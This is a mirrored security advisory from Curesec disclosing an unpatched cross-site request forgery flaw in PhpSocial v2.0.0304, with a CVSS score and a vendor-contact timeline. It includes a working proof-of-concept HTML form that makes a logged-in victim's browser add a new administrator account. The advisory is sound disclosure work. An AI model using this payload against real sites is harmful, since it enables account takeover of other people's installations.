Lucene search
K

PhpSocial 2.0.0304_20222226 - Cross-Site Request Forgery

🗓️ 23 Dec 2015 00:00:00Reported by Curesec Research TeamType 
zdt
 zdt
🔗 0day.today👁 232 Views

PhpSocial v2.0.0304 CSRF vulnerabilit

Code
Security Advisory - Curesec Research Team
 
1. Introduction
 
Affected Product:    PhpSocial v2.0.0304_20222226
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Webite:       http://phpsocial.net
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  11/21/2015
Disclosed to public: 12/21/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH
 
2. Overview
 
CVSS
 
Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P
 
Description
 
PhpSocial is a social networking software written in PHP. In version v2.0.0304,
it does not have CSRF protection, which means that an attacker can perform
actions for a victim, if the victim visits an attacker controlled site while
logged in.
 
3. Proof of Concept
 
Add a new admin:
 
 
<html>
  <body>
    <form action="http://localhost/PhpSocial_v2.0.0304_20222226/cms_phpsocial/admin/AdminAddViewadmins.php" method="POST">
      <input type="hidden" name="admin_username" value="admin2" />
      <input type="hidden" name="admin_password" value="admin" />
      <input type="hidden" name="admin_password_confirm" value="admin" />
      <input type="hidden" name="admin_name" value="admin2" />
      <input type="hidden" name="admin_email" value="[email protected]" />
      <input type="hidden" name="task" value="addadmin" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
4. Solution
 
This issue was not fixed by the vendor.
 
5. Report Timeline
 
11/21/ Contacted Vendor (no reply)
2015
12/10/ Tried to remind vendor (no email is given, [email protected] does
2015   not exist, and contact form could not be used because the website is
       down)
12/21/ Disclosed to public
2015
 
 
Blog Reference:
https://blog.curesec.com/article/blog/PhpSocial-v200304-CSRF-133.html
  
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

#  0day.today [2018-03-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation